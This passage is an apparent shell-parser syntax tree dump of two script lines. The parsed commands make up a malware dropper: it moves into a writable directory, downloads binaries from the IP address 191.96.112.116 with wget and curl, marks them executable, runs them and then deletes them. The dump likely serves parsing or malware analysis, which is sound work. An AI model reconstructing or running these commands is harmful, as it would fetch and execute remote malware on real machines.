    WordNode(lineno=13, pos=(1820, 1843), word='http://191.96.112.116/a'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1843, 1844)),
  CommandNode(lineno=13, pos=(1845, 1876), parts=[
    WordNode(lineno=13, pos=(1845, 1849), word='curl'),
    WordNode(lineno=13, pos=(1850, 1852), word='-O'),
    WordNode(lineno=13, pos=(1853, 1876), word='http://191.96.112.116/a'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1876, 1877)),
  CommandNode(lineno=13, pos=(1878, 1888), parts=[
    WordNode(lineno=13, pos=(1878, 1883), word='chmod'),
    WordNode(lineno=13, pos=(1884, 1886), word='+x'),
    WordNode(lineno=13, pos=(1887, 1888), word='a'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1888, 1889)),
  CommandNode(lineno=13, pos=(1890, 1893), parts=[
    WordNode(lineno=13, pos=(1890, 1893), word='./a'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1893, 1894)),
  CommandNode(lineno=13, pos=(1895, 1903), parts=[
    WordNode(lineno=13, pos=(1895, 1897), word='rm'),
    WordNode(lineno=13, pos=(1898, 1901), word='-rf'),
    WordNode(lineno=13, pos=(1902, 1903), word='a'),
  ]),
])
ListNode(lineno=14, pos=(1904, 2047), parts=[
  CommandNode(lineno=14, pos=(1904, 1911), parts=[
    WordNode(lineno=14, pos=(1904, 1906), word='cd'),
    WordNode(lineno=14, pos=(1907, 1911), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1912, 1914)),
  CommandNode(lineno=14, pos=(1915, 1926), parts=[
    WordNode(lineno=14, pos=(1915, 1917), word='cd'),
    WordNode(lineno=14, pos=(1918, 1926), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1927, 1929)),
  CommandNode(lineno=14, pos=(1930, 1937), parts=[
    WordNode(lineno=14, pos=(1930, 1932), word='cd'),
    WordNode(lineno=14, pos=(1933, 1937), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1938, 1940)),
  CommandNode(lineno=14, pos=(1941, 1949), parts=[
    WordNode(lineno=14, pos=(1941, 1943), word='cd'),
    WordNode(lineno=14, pos=(1944, 1949), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1950, 1952)),
  CommandNode(lineno=14, pos=(1953, 1957), parts=[
    WordNode(lineno=14, pos=(1953, 1955), word='cd'),
    WordNode(lineno=14, pos=(1956, 1957), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1957, 1958)),
  CommandNode(lineno=14, pos=(1959, 1987), parts=[
    WordNode(lineno=14, pos=(1959, 1963), word='wget'),
    WordNode(lineno=14, pos=(1964, 1987), word='http://191.96.112.116/z'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1987, 1988)),
  CommandNode(lineno=14, pos=(1989, 2020), parts=[
    WordNode(lineno=14, pos=(1989, 1993), word='curl'),
    WordNode(lineno=14, pos=(1994, 1996), word='-O'),
    WordNode(lineno=14, pos=(1997, 2020), word='http://191.96.112.116/z'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2020, 2021)),
  CommandNode(lineno=14, pos=(2022, 2032), parts=[
    WordNode(lineno=14, pos=(2022, 2027), word='chmod'),
    WordNode(lineno=14, pos=(2028, 2030), word='+x'),
    WordNode(lineno=14, pos=(2031, 2032), word='z'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2032, 2033)),
  CommandNode(lineno=14, pos=(2034, 2037), parts=[
    WordNode(lineno=14, pos=(2034, 2037), word='./z'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2037, 2038)),
  CommandNode(lineno=14, pos=(2039, 2047), parts=[
    WordNode(lineno=14, pos=(2039, 2041), word='rm'),
    WordNode(lineno=14, pos=(2042, 2045), word='-rf'),
    WordNode(lineno=14, pos=(2046, 2047), word='z'),
  ]),
])
